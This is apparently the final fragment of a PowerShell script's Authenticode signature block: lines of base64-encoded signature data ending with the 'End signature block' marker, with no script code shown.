1pQu9qG+VW6IqmVbt9vtiMGDdqcfzudnoPuNBycpnnqyPNImjIzIXKvgssuXTcBO # oCC1tQZgx9y3j40oQ/Bwfv642gHwoOJgRJSBlV9dKwfZFKtV6MecDtVsthGBCYOR # j2FPz9UBbFSYObUiusW/hC7y40hEOFl3/LFZUQfiW4AclBItDD+zBMcKYrhF1ivb # 3aTi4RTKo2Q+QbAvkY6g4MMP6K/kT8+QinunsiVE7CdANv+VaGdzdS+OF6ib2fCi # bG3jo/YcKw+D9ElUs1Te8rGsQH19DfIb71MgJV+rwVNAPI+TiUgjaj/08h35jPOp # waozsAi0WTxdfvLF3X2DrKD1nP0A8jSDXrdsLx1OEzpP7v+qgkb7moj0Wg5264q3 # ffn58phOcTWn1RLcXYFWmoRBBIGRrIFnM79v9MGu5F5qBkXD6E40s+zHqPwQns0T # iGNBJmjhORshgT6opz+BRNpp0Mvj81juFqLdEFydlIfFQsljS1P+ILbw9Me7Zu/T # j4k7jEQ1KY/hCZARgIuRJbD6o3S2I0d55HomGcu+z5S6zlIZVgljPMpjsx48qOtq # 8CWIMYnjuSsDEowSyM9zq/WW # SIG # End signature block